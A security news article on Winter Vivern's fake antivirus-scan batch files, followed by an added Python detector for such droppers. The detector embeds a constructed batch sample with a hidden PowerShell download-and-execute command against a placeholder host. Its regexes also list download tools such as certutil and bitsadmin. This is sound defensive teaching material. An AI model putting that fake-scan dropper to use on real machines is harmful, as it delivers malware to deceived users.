Winter Vivern APT hackers use fake antivirus scans to install malware (Security News, March 2023)

Sentinel Labs has previously seen spreadsheet files with malicious macros that launch PowerShell being dropped on cloned sites used by the APT.

Deploying fake virus scanners
One example of Winter Vivern's resourcefulness in the Sentinel Labs report is the use of Windows batch files to impersonate antivirus scanners while, in reality, downloading malicious payloads.
In the batch files shown in the Sentinel Labs report, the script pretends to perform an antivirus scan, printing a running percentage of time remaining, while quietly downloading a malicious payload using PowerShell.
The malware is hosted on compromised WordPress websites, which are commonly used for malware distribution campaigns.
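Added here as a worked example, not code from the Sentinel Labs report or from Winter Vivern's own tooling: a small Python heuristic that flags batch files combining a fake-scan lure (progress output, "scanning"/"threat" wording) with a hidden PowerShell download. The two sample batch files are constructed for illustration, and the URL under example.invalid is a placeholder, not an indicator from the campaign.

```python
import re

# Constructed samples (not the real droppers). BENIGN_BAT shows progress but
# never fetches anything; SUSPICIOUS_BAT mimics the fake-scan-plus-download
# pattern described in the article, with a placeholder URL.
BENIGN_BAT = r"""@echo off
echo Running disk cleanup...
for /L %%i in (10,10,100) do (
    echo Progress: %%i%%
    timeout /t 1 /nobreak >nul
)
echo Done.
"""

SUSPICIOUS_BAT = r"""@echo off
title Antivirus Scan
echo Scanning system for threats...
for /L %%i in (5,5,100) do (
    echo Time remaining: %%i%% complete
    timeout /t 1 /nobreak >nul
)
powershell -nop -w hidden -ep bypass -c "IEX ((New-Object Net.WebClient).DownloadString('http://example.invalid/p'))"
echo No threats found.
"""

# Each indicator is a regex over the raw batch text. Names are used in the
# returned report so an analyst can see which heuristics fired.
INDICATORS = {
    # wording that sells the script as a security scan
    "scan_lure": re.compile(
        r"\b(?:scan(?:ning)?|antivirus|threats?|time remaining)\b", re.I),
    # an echo line that prints a percentage (batch writes '%' as '%%')
    "progress_output": re.compile(r"^\s*echo\b.*%", re.I | re.M),
    # powershell launched with hide/bypass/encoded switches
    "hidden_powershell": re.compile(
        r"\bpowershell(?:\.exe)?\b[^\n]*?(?:-w(?:indowstyle)?\s+hidden|-nop\b|"
        r"-noni\b|-e(?:p|xecutionpolicy)\s+bypass|-enc(?:odedcommand)?\b)", re.I),
    # download primitives in PowerShell or common LOLBins
    "download_primitive": re.compile(
        r"(?:DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|"
        r"Net\.WebClient|Start-BitsTransfer|bitsadmin\s+/transfer|"
        r"certutil\b[^\n]*-urlcache|\bcurl\b)", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def scan_batch(text: str) -> dict:
    """Return which indicators fired, any embedded URLs, and a verdict.

    The verdict is 'suspicious' only when a lure AND a fetch primitive are both
    present: either alone is common in legitimate admin scripts.
    """
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    lure = hits["scan_lure"] or hits["progress_output"]
    fetch = hits["hidden_powershell"] or hits["download_primitive"]
    if lure and fetch:
        verdict = "suspicious: fake-scan lure combined with a PowerShell download"
    elif fetch:
        verdict = "review: downloads content via PowerShell or a LOLBin"
    else:
        verdict = "benign-looking"
    return {
        "indicators": [name for name, hit in hits.items() if hit],
        "urls": URL_RE.findall(text),
        "verdict": verdict,
    }


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_BAT), ("suspicious", SUSPICIOUS_BAT)):
        report = scan_batch(sample)
        print(f"{label}: {report['verdict']}")
        print(f"  indicators: {report['indicators']}")
        print(f"  urls: {report['urls']}")
```

The point of the two-factor verdict is precision: a progress bar or a single Invoke-WebRequest is everyday admin scripting, but a script that advertises itself as a virus scan and also pulls content from the network with a hidden PowerShell window is exactly the combination the report describes. Extracted URLs are returned so they can be checked against the compromised-site list an analyst is already tracking.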
The Aperetif malware is capable of automatic file scanning and exfiltration, taking screenshots and sending all collected data in base64-encoded form to a hardcoded command-and-control (C2) server URL. Sentinel Labs has recently spotted a new payload used by Winter Vivern that appears similar in functionality to Aperetif but has an incomplete design, indicating that it is a work in progress.
In conclusion, Winter Vivern is a group that uses a relatively simplistic yet effective approach to lure its targets into downloading malicious files.